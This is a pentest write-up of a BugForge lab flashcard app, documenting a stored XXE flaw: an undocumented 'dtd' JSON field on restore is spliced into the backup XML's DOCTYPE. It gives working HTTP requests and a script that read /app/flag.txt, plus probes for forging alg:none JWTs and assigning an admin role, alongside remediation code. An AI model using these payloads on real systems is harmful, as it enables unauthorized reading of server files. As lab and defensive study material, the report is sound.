Tanuki: Stored XXE via a Hidden JSON Field
Part 1 — Pentest Report
Executive Summary
Tanuki is a spaced-repetition flashcard application on BugForge, built on an Express backend with a React and Material-UI frontend. Testing identified a stored XML External Entity (XXE) vulnerability in the deck backup and restore feature: the restore endpoint accepts an undocumented JSON field that the backup endpoint splices raw into the DOCTYPE of an XML export, where it is parsed and resolved. This allows arbitrary read of files on the application server.
Testing confirmed 1 finding:
| ID | Title | Severity | CVSS | CWE | Endpoint |
|---|---|---|---|---|---|
| F1 | Stored XXE via undocumented dtd field in deck restore/backup round-trip | High | 6.5 | CWE-611, CWE-915 | POST /api/decks/:id/restore + GET /api/decks/:id/backup |
F1 is the flag-bearing finding. An attacker with any registered account can write an <!ENTITY> declaration into a deck through the dtd field on restore, then trigger the backup export to have the server resolve that entity against a local file path. The contents of /app/flag.txt were read back inside the exported XML, confirming arbitrary server-side file read.
Objective
Assess the Tanuki flashcard application for web vulnerabilities and recover the engagement flag.
Scope / Initial Access
# Target Application
URL: https://lab-1779238897562-ocx1n6.labs-app.bugforge.io
# Auth details
Registration: POST /api/register {username, email, password, full_name}
returns {token, user}
Session: JWT (HS256), payload {id, username, iat} — no role, no exp claim
Storage: localStorage holds `token` and a `user` object
Starting privileges: standard user (role "user", assigned server-side)
Registration is open and self-service. A new account receives a signed JWT immediately and the role field on the user record defaults to "user". All testing below was performed from a single standard-user account.
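The claim layout described above can be checked locally by decoding the payload segment of a token. The following is a minimal sketch, assuming Node.js 16 or later for `base64url` support in `Buffer`. The token is a made-up sample with a placeholder signature, not a real Tanuki token, and `decodeJwtPayload` is a hypothetical helper name.

```javascript
// Hypothetical helper: decode (not verify) the payload segment of a JWT.
function decodeJwtPayload(token) {
  const parts = token.split('.');
  if (parts.length !== 3) throw new Error('not a three-part JWT');
  return JSON.parse(Buffer.from(parts[1], 'base64url').toString('utf8'));
}

// Build a sample token with the claim layout the report describes.
// Claim values and the signature segment are placeholders for illustration.
const enc = (obj) => Buffer.from(JSON.stringify(obj)).toString('base64url');
const sampleToken = [
  enc({ alg: 'HS256', typ: 'JWT' }),
  enc({ id: 5, username: 'tester', iat: 1779238897 }),
  'placeholder-signature',
].join('.');

const payload = decodeJwtPayload(sampleToken);
// List the claims that a reviewer would expect but that are absent.
const missingClaims = ['role', 'exp'].filter((claim) => !(claim in payload));
console.log(payload, 'missing claims:', missingClaims);
```

Decoding only reads the claims; it says nothing about whether the server verifies the signature, which has to be tested separately.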
Reconnaissance — Reading the Backup Export Format
The application surface was mapped from the React bundle (main.9f7a4f9f.js) and by direct probing of the API. The backup feature stood out: GET /api/decks/:id/backup returns an XML document, and its structure revealed how the server builds that XML.
- GET /api/decks/:id/backup returns an XML export of a deck. The output contains a raw, unescaped & character in the seed deck name Planets & Moons (rendered as &, not &amp;). An unescaped & in XML output indicates the document is assembled by string templating, not by a real XML builder.
- The same output carries a <!DOCTYPE backup [ ]> wrapper with an empty internal subset. A surviving but empty DOCTYPE indicates the assembled string is parsed and then re-serialized before being returned.
- Taken together, the two observations above describe a string-built, parse-then-reserialize round-trip, which is the precondition for XXE if any attacker-controlled value reaches the DOCTYPE.
- There is no XML import widget in the frontend bundle. The backup endpoint is download-only from the user-facing flow, which meant the XML-consuming counterpart had to be found by direct probing.
- POST /api/decks/:id/backup returns 405 {"error":"Debug: Did you mean /restore?"}. The server itself names the companion endpoint.
- POST /api/decks/:id/restore returns 200 {"id":N, "message":"Backup restored successfully", "cards_count":N}. This is the write counterpart to the backup export, and it creates a new deck per call.
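The two recon tells (a bare ampersand and a surviving, empty DOCTYPE) can be checked mechanically against any XML export. This is a rough sketch using regular expressions rather than a parser. `findXmlTells` is a hypothetical helper, and the sample string only approximates the export, since the report does not show the full element layout.

```javascript
// Hypothetical helper: flag the two recon tells in an XML export.
function findXmlTells(xml) {
  // An ampersand that does not begin a named or numeric entity reference.
  const bareAmpersand = /&(?![A-Za-z_][\w.-]*;|#\d+;|#x[0-9A-Fa-f]+;)/.test(xml);
  // A DOCTYPE declaration, capturing the internal subset "[ ... ]" if present.
  const doctype = /<!DOCTYPE\s+[^\[>]+(\[[\s\S]*?\])?\s*>/.exec(xml);
  const emptyInternalSubset = Boolean(
    doctype && doctype[1] && doctype[1].slice(1, -1).trim() === ''
  );
  return { bareAmpersand, hasDoctype: Boolean(doctype), emptyInternalSubset };
}

// Sample shaped like the export described above (layout is an assumption).
const sampleExport = '<!DOCTYPE backup [ ]>\n<backup><name>Planets & Moons</name></backup>';
const tells = findXmlTells(sampleExport);
console.log(tells);
```

A heuristic like this is only a triage aid: it points at exports worth a manual look and does not prove that the output is re-parsed.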
Application Architecture
| Component | Detail |
|---|---|
| Backend | Express (X-Powered-By: Express) |
| Frontend | React + Material-UI single-page app, bundle main.9f7a4f9f.js |
| Auth | JWT HS256, payload {id, username, iat}, no role claim, no expiry |
| Database | Relational; tables inferred as users, decks, cards, study_sessions |
API Surface
| Endpoint | Method | Auth | Notes |
|---|---|---|---|
| /api/register | POST | No | Open registration, returns JWT |
| /api/login | POST | No | Credential login |
| /api/verify-token | GET | Yes | Returns the persisted user record including role |
| /api/decks/:id/backup | GET | Yes | XML export of a deck (string-templated, parse-reserialized) |
| /api/decks/:id/restore | POST | Yes | JSON deck import, creates a new deck |
| /api/admin/users | GET/POST/PUT/DELETE | Yes (admin) | Role-gated, enforced on every verb |
Attack Chain Visualization
┌──────────────────┐   ┌──────────────────┐   ┌──────────────────┐   ┌──────────────────┐
│ Recon: backup    │   │ Find the write   │   │ POST /restore    │   │ GET /backup      │
│ XML has raw `&`  │──▶│ counterpart:     │──▶│ with undocumented│──▶│ splices `dtd`    │
│ + empty DOCTYPE  │   │ POST .../restore │   │ `dtd` = <!ENTITY>│   │ into DOCTYPE,    │
│ = string-built   │   │ (405 hints it)   │   │ + name = &xxe;   │   │ parses, resolves │
└──────────────────┘   └──────────────────┘   └──────────────────┘   └────────┬─────────┘
                                                                              │
                                                                              ▼
                                                                  ┌───────────────────────┐
                                                                  │ /app/flag.txt content │
                                                                  │ returned in <name>    │
                                                                  └───────────────────────┘
Findings
F1 — Stored XXE via undocumented dtd field in deck restore/backup round-trip
Severity: High
CVSS v3.1: 6.5 — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-611 (Improper Restriction of XML External Entity Reference), CWE-915 (Improperly Controlled Modification of Dynamically-Determined Object Attributes)
Endpoint: POST /api/decks/:id/restore (write) + GET /api/decks/:id/backup (trigger)
Authentication required: Yes (any registered user)
Severity note: The CVSS v3.1 base score for this vector is 6.5 (Medium). The finding is rated High here because of its importance within the lab, consistent with the two prior Tanuki XXE engagements (2026-05-08, 2026-05-13): the defect yields arbitrary read of files on the application server, which is the engagement objective.
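The 6.5 figure can be reproduced from the vector string. The sketch below applies the CVSS v3.1 base-score equations for the scope-unchanged case, using the metric weights published in the specification. The function names are illustrative, and it covers only what this vector needs.

```javascript
// CVSS v3.1 weights for AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
const weights = { AV: 0.85, AC: 0.77, PR: 0.62, UI: 0.85, C: 0.56, I: 0, A: 0 };

// Roundup as defined in the CVSS v3.1 specification: round up to one decimal
// place, using integer arithmetic to avoid floating-point artifacts.
function roundUp(x) {
  const i = Math.round(x * 100000);
  return i % 10000 === 0 ? i / 100000 : (Math.floor(i / 10000) + 1) / 10;
}

// Base score for Scope: Unchanged only.
function baseScoreScopeUnchanged(m) {
  const iss = 1 - (1 - m.C) * (1 - m.I) * (1 - m.A); // impact sub-score
  const impact = 6.42 * iss;
  const exploitability = 8.22 * m.AV * m.AC * m.PR * m.UI;
  if (impact <= 0) return 0;
  return roundUp(Math.min(impact + exploitability, 10));
}

const score = baseScoreScopeUnchanged(weights);
console.log(score); // 6.5
```

With confidentiality as the only impacted property, the impact term is about 3.60 and the exploitability term about 2.84, which sum to roughly 6.43 and round up to 6.5.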
Description
Two defects compound to produce a stored XXE:
- The restore endpoint accepts an undocumented field. POST /api/decks/:id/restore takes a JSON deck. Beyond the documented {name, description, category, cards}, it also stores an undocumented dtd field verbatim on the deck record. The field is not part of the deck schema and is never displayed by the frontend.
- The backup endpoint string-templates the stored dtd into a DOCTYPE. GET /api/decks/:id/backup exports a deck as XML by string-templating deck fields into a fixed skeleton without XML-escaping. The stored dtd value is spliced raw into the DOCTYPE internal subset:

    <!DOCTYPE backup [ ${dtd} ]>
    <backup><name>${name}</name>...

  The assembled string is then parsed and re-serialized before it is returned. If dtd contains an <!ENTITY> declaration and a rendered field such as name contains the matching &entity; reference, the parse step resolves the external entity, and the re-serialized output carries the resolved file contents.
The exploit requires both halves: the dtd field carries the entity definition, and a rendered field carries the entity reference so the resolved value is returned to the attacker. This was confirmed by isolation testing — a restore payload with no dtd field leaves &xxe; literal in the output, and of the candidate field names tested (dtd, doctype, entities, entity, xml, header), only dtd triggers resolution.
The empty [ ] internal subset in the backup output is a side effect of re-serialization: the serializer expands the entity reference and drops the declaration it came from. It is the fingerprint of the parse-then-reserialize round-trip, not evidence of a server-defined entity.
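The splice described above can be illustrated without any XML parser. The following sketch reproduces only the string-assembly step, based on the template shape shown in this report. It is not the application's source, and `buildBackupXmlUnsafe` is a hypothetical name.

```javascript
// Sketch of the vulnerable assembly step: deck fields go straight into the
// template, and the stored dtd value lands inside the DOCTYPE internal subset.
function buildBackupXmlUnsafe(deck) {
  return `<!DOCTYPE backup [ ${deck.dtd || ''} ]>\n<backup><name>${deck.name}</name></backup>`;
}

// A seed-style deck: no dtd, so the internal subset stays empty.
const benign = buildBackupXmlUnsafe({ name: 'Planets & Moons' });

// A restored deck carrying both halves of the exploit.
const hostile = buildBackupXmlUnsafe({
  name: '&xxe;',
  dtd: '<!ENTITY xxe SYSTEM "file:///app/flag.txt">',
});

console.log(benign);
console.log(hostile);
```

Once the second string is handed to a parser that loads DTDs and substitutes entities, the reference in the name element resolves to the file contents.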
Impact
Arbitrary read of files on the application server, available to any registered user.
Reproduction
Step 1 — Register an account to obtain a JWT
POST /api/register HTTP/1.1
Host: lab-1779238897562-ocx1n6.labs-app.bugforge.io
Content-Type: application/json
{"username":"tester","email":"[email protected]","password":"Passw0rd!","full_name":"Test User"}
Response: 200 with {"token":"<jwt>","user":{...}}. Use the token as Authorization: Bearer <jwt> for the next two steps.
Step 2 — Restore a deck carrying the entity definition in dtd
POST /api/decks/1/restore HTTP/1.1
Host: lab-1779238897562-ocx1n6.labs-app.bugforge.io
Authorization: Bearer <jwt>
Content-Type: application/json
{"name":"&xxe;","description":"x","category":"x",
"dtd":"<!ENTITY xxe SYSTEM \"file:///app/flag.txt\">",
"cards":[{"front":"f","back":"b"}]}
Response: 200 {"id":<N>,"message":"Backup restored successfully","cards_count":1}. Note the new deck id <N>.
Step 3 — Trigger the export to resolve the entity
GET /api/decks/<N>/backup HTTP/1.1
Host: lab-1779238897562-ocx1n6.labs-app.bugforge.io
Authorization: Bearer <jwt>
Response: XML with the file contents resolved into the rendered field:
<!DOCTYPE backup [
]>
<backup><name>bug{qHQps5HW84zV5zBRiyLuUhqdsPzDITFN}</name>...
The <name> element contains the contents of /app/flag.txt. Any readable path on the application server can be substituted into the file:// URI.
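Steps 2 and 3 can be scripted for retesting after a fix. This is a minimal sketch, assuming Node.js 18 or later for the global `fetch` API. The function names are hypothetical, the deck id `1` in the restore path mirrors Step 2, and the `name` extraction assumes the export layout shown above.

```javascript
// Build the Step 2 restore body for a given absolute file path.
function buildRestoreBody(targetPath) {
  return {
    name: '&xxe;', // rendered field that carries the entity reference
    description: 'x',
    category: 'x',
    dtd: `<!ENTITY xxe SYSTEM "file://${targetPath}">`, // entity definition
    cards: [{ front: 'f', back: 'b' }],
  };
}

// Run Step 2 then Step 3 and return whatever the export placed in <name>.
async function readFileViaBackup(baseUrl, token, targetPath) {
  const headers = { Authorization: `Bearer ${token}`, 'Content-Type': 'application/json' };
  const restore = await fetch(`${baseUrl}/api/decks/1/restore`, {
    method: 'POST',
    headers,
    body: JSON.stringify(buildRestoreBody(targetPath)),
  });
  const { id } = await restore.json(); // id of the newly created deck
  const backup = await fetch(`${baseUrl}/api/decks/${id}/backup`, { headers });
  const xml = await backup.text();
  const match = /<name>([\s\S]*?)<\/name>/.exec(xml);
  return match ? match[1] : null;
}
```

After remediation the same call should return the literal reference (or an escaped form of it) rather than file contents, which makes it usable as a regression check.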
Remediation
Fix 1 — Drop unknown fields on restore
The restore handler must accept only the documented deck schema. The dtd field should never reach storage.
// BEFORE (Vulnerable) — whole body persisted, including unknown fields
const deck = await Deck.create(req.body);
// AFTER (Secure) — explicit field whitelist
const { name, description, category, cards } = req.body;
const deck = await Deck.create({ name, description, category, cards });
Fix 2 — Build the backup XML with a real serializer, not string templating
String-templating user values into XML allows both unescaped metacharacters and DOCTYPE injection. Use an XML builder that escapes content, and never interpolate any value into a DOCTYPE.
// BEFORE (Vulnerable) — string-templated, no escaping, attacker value in DOCTYPE
const xml = `<!DOCTYPE backup [
${deck.dtd}
]>
<backup><name>${deck.name}</name>...`;
// AFTER (Secure) — builder escapes content; no DOCTYPE emitted
const { create } = require('xmlbuilder2');
const xml = create({ version: '1.0' })
.ele('backup')
.ele('name').txt(deck.name).up()
.ele('description').txt(deck.description).up()
.end({ prettyPrint: true });
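To make concrete what "escapes content" means, the sketch below shows the character-level escaping a builder applies to text nodes. It is an illustration only: `escapeXml` is a hypothetical helper, and hand-rolled escaping is not a substitute for the builder recommended above.

```javascript
// Escape the five XML metacharacters. The ampersand must be replaced first
// so that the entities produced by later replacements are not double-escaped.
function escapeXml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&apos;');
}

console.log(escapeXml('Planets & Moons')); // Planets &amp; Moons
console.log(escapeXml('&xxe;'));           // &amp;xxe;
```

With the name escaped this way, the payload from Step 2 reaches the parser as literal text, so there is no entity reference left to resolve even if a declaration were present.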
Fix 3 — Disable DTD and external-entity processing on the parser
The parse-and-reserialize step should not process DTDs or external entities.
// AFTER (Secure) — libxml2-based parser with DTD/network loading off
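const { parseXml } = require('libxmljs2'); // assumption: libxmljs2 or another libxmljs-compatible binding
const parsed = parseXml(xml, {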
dtdload: false, // do not load external DTDs
dtdvalid: false, // do not validate against a DTD
noent: false, // do not substitute entities
nonet: true, // never fetch over the network
});
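As defense in depth, the export path could refuse any assembled document that contains a DOCTYPE or entity declaration before it reaches the parser. This is a sketch of such a guard, assuming Fix 2 is in place so that legitimate exports no longer emit a DOCTYPE. `assertNoDoctype` is a hypothetical name.

```javascript
// Reject documents that declare a DOCTYPE or an entity. The match is
// case-insensitive on purpose: it is stricter than XML itself requires.
function assertNoDoctype(xml) {
  if (/<!DOCTYPE/i.test(xml) || /<!ENTITY/i.test(xml)) {
    throw new Error('DOCTYPE or ENTITY declaration not allowed in backup XML');
  }
  return xml;
}

// A builder-produced export passes through unchanged.
const safeXml = assertNoDoctype('<backup><name>Planets &amp; Moons</name></backup>');
console.log(safeXml);
```

A guard like this complements the parser flags and does not replace them. It fails closed if a later change reintroduces a DOCTYPE into the template.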
Additional recommendations:
- Remove the 405 debug message that names the /restore endpoint.
- Apply a schema validator (for example, a JSON Schema) to the restore body so the contract is enforced in one place rather than by ad-hoc destructuring.
- The application should not need to read /app/flag.txt; restrict the runtime user’s filesystem access to only the paths it requires.
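The schema-validation recommendation can be sketched without a library. The example below rejects unknown keys and checks types for the four documented fields. Treating all four as required is an assumption, since the report does not state which are optional, and `validateDeckBody` is a hypothetical name. A production service would more likely use an established JSON Schema validator.

```javascript
// Documented string fields of the deck contract; cards is checked separately.
const DECK_STRING_FIELDS = ['name', 'description', 'category'];

// Return a list of validation errors; an empty list means the body is valid.
function validateDeckBody(body) {
  if (body === null || typeof body !== 'object' || Array.isArray(body)) {
    return ['body must be a JSON object'];
  }
  const errors = [];
  const allowed = new Set([...DECK_STRING_FIELDS, 'cards']);
  for (const key of Object.keys(body)) {
    if (!allowed.has(key)) errors.push(`unknown field: ${key}`);
  }
  for (const key of DECK_STRING_FIELDS) {
    if (typeof body[key] !== 'string') errors.push(`${key} must be a string`);
  }
  if (!Array.isArray(body.cards)) {
    errors.push('cards must be an array');
  } else {
    body.cards.forEach((card, i) => {
      const ok = card && typeof card.front === 'string' && typeof card.back === 'string';
      if (!ok) errors.push(`cards[${i}] must have string front and back`);
    });
  }
  return errors;
}

const validDeck = { name: 'a', description: 'b', category: 'c', cards: [{ front: 'f', back: 'b' }] };
console.log(validateDeckBody(validDeck));                      // []
console.log(validateDeckBody({ ...validDeck, dtd: '<!ENTITY x "y">' })); // [ 'unknown field: dtd' ]
```

Rejecting unknown fields outright, rather than silently dropping them, also surfaces probing attempts in the application logs.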
OWASP Top 10 Coverage
- A05:2021 – Security Misconfiguration: The XML parser used for the backup round-trip processes DTDs and external entities, which is the root condition for XXE.
- A03:2021 – Injection: The stored dtd value is string-templated directly into the XML document’s DOCTYPE, injecting an attacker-controlled entity declaration into the parsed document.
- A04:2021 – Insecure Design: The restore endpoint persists the full request body without a schema, so an undocumented field flows straight to storage and then into the export template.
Tools Used
| Tool | Purpose |
|---|---|
| Browser dev tools | Inspecting the React bundle and mapping the API surface |
| curl / Burp Suite | Crafting the restore and backup requests, isolation testing |
| jwt_tool | Inspecting the JWT structure (no role claim, no expiry) |
References
- CWE-611: Improper Restriction of XML External Entity Reference
- CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes
- OWASP XML External Entity Prevention Cheat Sheet
- OWASP Mass Assignment Cheat Sheet
Part 2 — Notes / Knowledge
Key Learnings
- An export endpoint’s output is recon for how that XML is built. When a backup or download endpoint emits XML with an unescaped & and a surviving <!DOCTYPE> wrapper, the server is string-templating XML and parsing it back rather than using a real XML builder. That pairing marks a write-then-export round-trip worth attacking: find the endpoint that feeds the export and look for a value that lands inside the DOCTYPE. On Tanuki the seed deck Planets & Moons appeared in the backup output with a raw &, and the DOCTYPE survived empty; both tells were visible before a single payload was sent.
- XXE does not require posting XML. The <!ENTITY> definition can ride in an ordinary JSON field that the server splices into an XML template, with resolution firing on a separate, later export request. When a JSON write endpoint is paired with an XML export, fuzz the write body for undocumented fields (dtd, doctype, xml) and pair them with an &entity; reference in a field the export renders. Here the write was plain JSON to /restore and the parse happened only when /backup was called, so the two halves of the exploit lived in two different requests.
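The field-name fuzzing described above can be organised as one control body plus one probe per candidate name. This is a sketch with hypothetical helper names. The candidate list is the one used during isolation testing in this engagement, and the hit check is a heuristic that assumes an unresolved reference comes back as the literal &xxe; in the name element.

```javascript
// Candidate names tried during isolation testing in this engagement.
const CANDIDATE_FIELDS = ['dtd', 'doctype', 'entities', 'entity', 'xml', 'header'];

// Build a control body (no extra field) plus one probe body per candidate.
function buildProbeBodies(entityDecl, fields = CANDIDATE_FIELDS) {
  const base = { name: '&xxe;', description: 'x', category: 'x', cards: [{ front: 'f', back: 'b' }] };
  const control = { field: null, body: { ...base } };
  const probes = fields.map((field) => ({ field, body: { ...base, [field]: entityDecl } }));
  return [control, ...probes];
}

// Heuristic: a probe hits when <name> no longer holds the literal reference.
function entityWasResolved(exportXml) {
  const match = /<name>([\s\S]*?)<\/name>/.exec(exportXml);
  return Boolean(match) && match[1] !== '&xxe;';
}

const probes = buildProbeBodies('<!ENTITY xxe SYSTEM "file:///app/flag.txt">');
console.log(probes.map((p) => p.field));
```

Each body is sent to the write endpoint and the resulting deck is exported. Comparing every export against the control isolates which field name, if any, reaches the DOCTYPE.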
Failed Approaches
| Approach | Result | Why It Failed |
|---|---|---|
| GET /api/admin/users with a standard-user JWT | 403 {"error":"Admin access required"} | The /api/admin/* route group enforces a role check on every verb; no per-handler drift |
| Mass assignment of role on POST /api/register (role, isAdmin, is_admin, combined) | All silently dropped; verify-token showed role stayed "user" | Register handler destructures a fixed field whitelist from the body |
| JWT forged with alg:none | 403 {"error":"Invalid token"} | Server enforces the HS256 signature; unsigned tokens rejected |
| XXE by posting raw XML to /restore (application/xml, text/xml, text/plain, JSON-wrapped XML) | 200 with deck name "Untitled Deck", cards_count:0 | The restore handler parses only JSON; non-JSON bodies fail to parse and the handler defaults silently. The XML had to be delivered through the JSON dtd field instead |
| File-upload XXE | No upload widget in the frontend bundle | The backup feature is download-only; the XML-consuming path is the JSON /restore endpoint, found by probing |
Tags: #xxe #xml-external-entity #mass-assignment #stored #bugforge #webapp
Document Version: 1.0
Last Updated: 2026-05-20